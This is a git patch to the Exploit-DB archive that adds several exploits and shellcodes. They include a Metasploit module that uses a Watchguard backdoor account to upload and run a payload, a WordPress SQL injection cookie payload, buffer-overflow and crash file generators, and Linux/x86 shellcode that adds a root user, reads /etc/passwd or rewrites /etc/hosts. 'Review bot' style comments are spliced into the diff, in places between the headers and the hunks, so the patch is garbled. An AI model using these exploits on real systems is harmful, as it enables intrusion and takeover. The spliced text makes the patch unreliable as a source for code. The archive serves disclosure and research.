From c1b7aa12fcca73aebc110ed32200f85183336889 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 15 Sep 2018 05:01:52 +0000 Subject: [PATCH] DB: 2018-09-15 10 changes to exploits/shellcodes CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC) InfraRecorder 0.53 - '.txt' Denial of Service (PoC) Faleemi Plus 1.0.2 - Denial of Service (PoC) Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH) Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit) Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) --- exploits/linux/webapps/45409.rb | 142 +++++++++++++++++++++++++++ exploits/php/webapps/45411.txt | 48 +++++++++ exploits/windows_x86-64/dos/45410.py | 27 +++++ exploits/windows_x86-64/dos/45414.py | 25 +++++ exploits/windows_x86/dos/45413.py | 26 +++++ exploits/windows_x86/local/45412.py | 51 ++++++++++ files_exploits.csv | 6 ++ files_shellcodes.csv | 4 + shellcodes/linux_x86/45415.c | 80 +++++++++++++++ shellcodes/linux_x86/45416.c | 64 ++++++++++++ shellcodes/linux_x86/45417.c | 66 +++++++++++++ shellcodes/linux_x86/45418.c | 127 ++++++++++++++++++++++++ 12 files changed, 666 insertions(+) create mode 100755 exploits/linux/webapps/45409.rb create mode 100644 exploits/php/webapps/45411.txt create mode 100755 exploits/windows_x86-64/dos/45410.py create mode 100755 exploits/windows_x86-64/dos/45414.py create mode 100755 exploits/windows_x86/dos/45413.py create mode 100755 exploits/windows_x86/local/45412.py create mode 100644 shellcodes/linux_x86/45415.c create mode 100644 shellcodes/linux_x86/45416.c create mode 100644 shellcodes/linux_x86/45417.c create mode 100644 shellcodes/linux_x86/45418.c 
diff --git a/exploits/linux/webapps/45409.rb b/exploits/linux/webapps/45409.rb
new file mode 100755
index 000000000..2a0846feb
--- /dev/null
+++ b/exploits/linux/webapps/45409.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Watchguard AP Backdoor Shell',
+ 'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
+ gain a valid web session on the HTTP administration interface. The administrator
+ can then upload a shell directly to the web root to execute it.
+ This module can also be used if you have legitimate access credentials to the device.',
+ 'References' =>
+ [
+ ['CVE', 'CVE-2018-10575'],
+ ['CVE', 'CVE-2018-10576'],
+ ['CVE', 'CVE-2018-10577'],
+ ['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
+ ['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
+ ],
+ 'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Targets' => [ [ 'Automatic', { } ] ],
+ 'DefaultTarget' => 0,
+ 'Arch' => ARCH_MIPSBE,
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ #Opt::SSL(true),
+ OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
+ OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
+ ])
+ end
+
+ def exploit
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/luci/',
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ })
+
+ if res.nil? || res.get_cookies.empty?
+ fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
+ end
+
+ # We have a valid session, so we should pull out the access credentials and find the serial number
+ sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
+ stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
+
+ vprint_status("Got sysauth #{sysauth}")
+ vprint_status("Got stok #{stok}")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/cgi-bin/luci/;#{stok}/html/Status",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => sysauth,
+ })
+
+ if res.nil? || res.code != 200
+ fail_with(Failure::NotFound, 'Unable to request serial')
+ end
+
+ # Pull out the serial and store it for later
+ # var device_serial = "20AP0XXXXXXXX";
+ if res.body.match(/device_serial = "(\w+)";/)
+ serial = $1
+ else
+ fail_with(Failure::NotFound, 'Unable to find serial in response')
+ end
+
+ vprint_status("Got serial #{serial}")
+
+ # Finally, upload our payloads
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
+ 'data' => payload.encoded_exe,
+ })
+
+ if res.nil? || res.code != 205
+ fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+ end
+
+ # Upload the lua script that executes our payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
+ 'data' => "#!/usr/bin/lua
+os.execute('/bin/chmod +x /tmp/payload');
+os.execute('/tmp/payload');"
+ })
+
+ if res.nil? || res.code != 205
+ fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+ end
+
+ # Remove the trigger script once we've got a shell
+ register_file_for_cleanup("/www/cgi-bin/payload.luci")
+
+ vprint_status("Uploaded lua script")
+
+ # Trigger our payload
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/cgi-bin/payload.luci",
+ })
+
+ vprint_status("Requested lua payload")
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ vprint_error("Failed to connect to the web server")
+ return nil
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/45411.txt b/exploits/php/webapps/45411.txt
new file mode 100644
index 000000000..3179b3d3c
--- /dev/null
+++ b/exploits/php/webapps/45411.txt
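Review bot: Both upload checks `if res.nil? || res.code != 205` report the failure as `"Could not upload file 1: #{res.body}"`, so on a nil response the interpolation raises NoMethodError before `fail_with` ever runs, and the second check (the Lua script upload) repeats the "file 1" wording. Guard the interpolation, e.g. `fail_with(Failure::NotFound, "Could not upload file 1: #{res ? res.body : 'no response'}")`, and label the second one "file 2". The earlier `Unable to request serial` check shows the intended pattern, since it does not touch `res` in its message.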
@@ -0,0 +1,48 @@
+# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
+# Date: 2018-09-09
+# Exploit Author: Ceylan Bozogullarindan
+# Vendor Homepage: http://modalsurvey.pantherius.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
+# Version: 1.5.7.3
+# Tested on: Windows 10
+# CVE: N\A
+
+# Description
+# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter.
+
+# PoC
+# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
+# Answer that question.
+# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager,
+# and change it with the payload showed below;
+
+["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
+
+# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result
+# of the query. When you make it 1=1, you should see a question from firt record.
+# Therefore OR statement must be returned False.
+
+# Step 3. Reload the page. Open the source code of the page. Search "sss_params".
+# You will see the version of DB in value of sss_params parameter.
+
+# The Request
+
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+# The result from source code of the page
+
+
+
+DB version: "10.1.36-MariaDB-1~trusty"....
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45410.py b/exploits/windows_x86-64/dos/45410.py
new file mode 100755
index 000000000..cbf71224d
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45410.py
@@ -0,0 +1,27 @@
+# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
+# Discovery by: Alan Baeza
+# Discovery Date: 2018-09-13
+# Vendor Homepage: https://cdburnerxp.se/
+# Software Link: https://cdburnerxp.se/downloadsetup.exe
+# Tested Version: 4.5.8.6795
+# Tested on OS : Windows 10 Pro x64 es
+
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+# Steps to Produce the DoS:
+# 1.- Run python code : python dos.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open CdBurnerXP
+# 4.- Select option "Copy or grab disc"
+# 5.- Select checkbox target "Hard disk"
+# 6.- Paste ClipBoard on "File name"
+# 7.- Clic Copy disc
+# 8.- DoS
+
+import socket, os, sys
+
+buffer = "\x41" * 260
+
+f = open ("generate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45414.py b/exploits/windows_x86-64/dos/45414.py
new file mode 100755
index 000000000..b3ba63c9a
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45414.py
@@ -0,0 +1,25 @@
+# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-14
+# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
+# Tested Version: 1.0.2
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Now click "Add Camera" and in the new
+# window paste the content of "exploit.txt" into the following fields:
+# "Camera name" & "DID number". Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
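Review bot: `#!/usr/bin/env python` sits on line 9, after the header comments, where it is only a comment, so the file's 100755 mode does not make it directly runnable; the same misplaced shebang (`#!/usr/bin/python`) appears in 45414.py, 45413.py and 45412.py. Move it to line 1 or drop the executable bit. `import socket, os, sys` brings in three modules that nothing in the script uses; remove the line. The unguarded `f = open(...)` / `f.write(buffer)` / `f.close()` sequence leaves the handle open if `write` raises; `with open("generate.txt", "w") as f: f.write(buffer)` closes it on every path.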
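Review bot: The bare `except:` around the file write swallows every exception, including KeyboardInterrupt and SystemExit, and prints a fixed `File cannot be created` with no reason; 45413.py and 45412.py use the identical block. Narrow it to `except (IOError, OSError) as e:` and include `e` in the message, and let `with open("exploit.txt", "w") as f:` do the closing so a failed `write` cannot leave the handle open. The `print "..."` statements are Python 2 only; `print("...")` keeps the script runnable under both interpreters.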
diff --git a/exploits/windows_x86/dos/45413.py b/exploits/windows_x86/dos/45413.py
new file mode 100755
index 000000000..1b60a28cf
--- /dev/null
+++ b/exploits/windows_x86/dos/45413.py
@@ -0,0 +1,26 @@
+# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
+# Date: 2018-09-14
+# Exploit Author: Gionathan "John" Reale
+# Version: version 0.53
+# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
+# Tested on: Windows 7 32bit
+
+# Steps to Reproduce:
+# Run the python exploit script, it will create a new file with the name "exploit.txt".
+# Start the program and click "Edit" > "Import... "
+# Find the file "exploit.txt" and click "Open"
+# You will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45412.py b/exploits/windows_x86/local/45412.py
new file mode 100755
index 000000000..a4b13c538
--- /dev/null
+++ b/exploits/windows_x86/local/45412.py
@@ -0,0 +1,51 @@
+# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-13
+# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+# Tested on OS: Windows 7 32bit
+# Tested Version: 2.6
+# Steps to Reproduce:
+# Run the python exploit script, it will create a new file with the name "exploit.wma".
+# Start the program and click on "Convert".
+# Find the file "exploit.wma" and click "Open"
+# You will see a calculator poped up.
+
+#!/usr/bin/python
+
+buffer = "A" * 4116
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\x21\x21\xe4\x66"
+nops = "\x90" * 8
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf = ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+ f=open("exploit.wma","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 55f959f94..c2e936a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6109,6 +6109,9 @@ id,file,description,date,author,type,platform,port
 45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
 45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
 45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
+45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
+45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
+45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9969,6 +9972,7 @@ id,file,description,date,author,type,platform,port
 45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
 45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
 45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
+45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39975,3 +39979,5 @@ id,file,description,date,author,type,platform,port
 45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
 45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
+45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
+45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index c3b877e02..dd333117d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -908,3 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
+45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/45415.c b/shellcodes/linux_x86/45415.c
new file mode 100644
index 000000000..8938d2741
--- /dev/null
+++ b/shellcodes/linux_x86/45415.c
@@ -0,0 +1,80 @@
+/*
+# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 90 nop
+ 8048061: 58 pop eax
+ 8048062: 29 db sub ebx,ebx
+ 8048064: 31 c9 xor ecx,ecx
+ 8048066: 66 b9 01 04 mov cx,0x401
+ 804806a: 51 push ecx
+ 804806b: 5f pop edi
+ 804806c: 53 push ebx
+ 804806d: 6a 06 push 0x6
+ 804806f: 58 pop eax
+ 8048070: 48 dec eax
+ 8048071: 68 2f 2f 70 61 push 0x61702f2f
+ 8048076: 68 37 13 37 13 push 0x13371337
+ 804807b: 68 73 73 77 64 push 0x64777373
+ 8048080: 68 2f 65 74 63 push 0x6374652f
+ 8048085: 5a pop edx
+ 8048086: 5e pop esi
+ 8048087: 5f pop edi
+ 8048088: 5f pop edi
+ 8048089: 56 push esi
+ 804808a: 57 push edi
+ 804808b: 52 push edx
+ 804808c: 89 e3 mov ebx,esp
+ 804808e: cd 80 int 0x80
+ 8048090: 50 push eax
+ 8048091: 5a pop edx
+ 8048092: 92 xchg edx,eax
+ 8048093: 89 c3 mov ebx,eax
+ 8048095: 6a 05 push 0x5
+ 8048097: 31 d2 xor edx,edx
+ 8048099: 87 db xchg ebx,ebx
+ 804809b: 6a 0c push 0xc
+ 804809d: 58 pop eax
+ 804809e: 5a pop edx
+ 804809f: 92 xchg edx,eax
+ 80480a0: 52 push edx
+ 80480a1: 90 nop
+ 80480a2: 68 30 3a 3a 3a push 0x3a3a3a30
+ 80480a7: 56 push esi
+ 80480a8: 5e pop esi
+ 80480a9: 68 3a 3a 30 3a push 0x3a303a3a
+ 80480ae: 68 72 30 30 74 push 0x74303072
+ 80480b3: 48 dec eax
+ 80480b4: 89 e1 mov ecx,esp
+ 80480b6: 6a 01 push 0x1
+ 80480b8: cd 80 int 0x80
+ 80480ba: 6a 04 push 0x4
+ 80480bc: 58 pop eax
+ 80480bd: 83 c0 02 add eax,0x2
+ 80480c0: cd 80 int 0x80
+ 80480c2: 31 c0 xor eax,eax
+ 80480c4: 40 inc eax
+ 80480c5: cd 80 int 0x80
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45416.c b/shellcodes/linux_x86/45416.c
new file mode 100644
index 000000000..0047d6fa6
--- /dev/null
+++ b/shellcodes/linux_x86/45416.c
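Review bot: `main()` is declared without a return type, which relies on implicit int and is not valid C99 or later, and `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to `%d`, which is undefined behaviour and what `-Wformat` warns about; 45416.c, 45417.c and 45418.c contain the same two lines. Write `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));`. The two `#include` lines carry no header name in this rendering, presumably `<stdio.h>` and `<string.h>` lost to angle-bracket stripping, which is worth confirming against the raw file since `printf` and `strlen` would otherwise be implicitly declared. `int (*ret)() = (int(*)())code;` converts an object pointer to a function pointer, which the C standard leaves undefined; a one-line comment noting that the harness only works under the `-z execstack` build given in the header would save the next reader a surprise.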
@@ -0,0 +1,64 @@
+/*
+# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: eb 2b jmp 804808d
+
+08048062 :
+ 8048062: 31 c0 xor eax,eax
+ 8048064: b0 05 mov al,0x5
+ 8048066: 5b pop ebx
+ 8048067: 31 c9 xor ecx,ecx
+ 8048069: cd 80 int 0x80
+ 804806b: 89 c3 mov ebx,eax
+ 804806d: b0 03 mov al,0x3
+ 804806f: 89 e7 mov edi,esp
+ 8048071: 89 f9 mov ecx,edi
+ 8048073: 31 d2 xor edx,edx
+ 8048075: b6 10 mov dh,0x10
+ 8048077: cd 80 int 0x80
+ 8048079: 89 c2 mov edx,eax
+ 804807b: 31 c0 xor eax,eax
+ 804807d: b0 04 mov al,0x4
+ 804807f: 31 db xor ebx,ebx
+ 8048081: b3 01 mov bl,0x1
+ 8048083: cd 80 int 0x80
+ 8048085: 31 c0 xor eax,eax
+ 8048087: b0 01 mov al,0x1
+ 8048089: 31 db xor ebx,ebx
+ 804808b: cd 80 int 0x80
+
+0804808d :
+ 804808d: e8 d0 ff ff ff call 8048062
+
+08048092 :
+ 8048092: 2f das
+ 8048093: 65 gs
+ 8048094: 74 63 je 80480f9
+ 8048096: 2f das
+ 8048097: 70 61 jo 80480fa
+ 8048099: 73 73 jae 804810e
+ 804809b: 77 64 ja 8048101
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45417.c b/shellcodes/linux_x86/45417.c
new file mode 100644
index 000000000..283b842fd
--- /dev/null
+++ b/shellcodes/linux_x86/45417.c
@@ -0,0 +1,66 @@
+/*
+ # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
+ # Date: 2018-09-13
+ # Author: Ray Doyle (@doylersec)
+ # Tested on: Linux/x86
+ # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 29 c9 sub ecx,ecx
+ 8048062: 51 push ecx
+
+08048063 :
+ 8048063: 6a 05 push 0x5
+ 8048065: 58 pop eax
+ 8048066: 68 6f 73 74 73 push 0x7374736f
+ 804806b: 68 74 63 2f 68 push 0x682f6374
+ 8048070: 68 2f 2f 2f 65 push 0x652f2f2f
+ 8048075: 54 push esp
+ 8048076: 5b pop ebx
+ 8048077: 51 push ecx
+ 8048078: 41 inc ecx
+ 8048079: b5 04 mov ch,0x4
+ 804807b: cd 80 int 0x80
+ 804807d: 93 xchg ebx,eax
+ 804807e: 6a 04 push 0x4
+ 8048080: 58 pop eax
+
+08048081 :
+ 8048081: 68 2e 63 6f 6d push 0x6d6f632e
+ 8048086: 68 6f 67 6c 65 push 0x656c676f
+ 804808b: 68 31 20 67 6f push 0x6f672031
+ 8048090: 68 31 2e 31 2e push 0x2e312e31
+ 8048095: 68 31 32 37 2e push 0x2e373231
+ 804809a: 54 push esp
+ 804809b: 59 pop ecx
+ 804809c: 6a 14 push 0x14
+ 804809e: 5a pop edx
+ 804809f: cd 80 int 0x80
+
+080480a1 :
+ 80480a1: 92 xchg edx,eax
+ 80480a2: b0 06 mov al,0x6
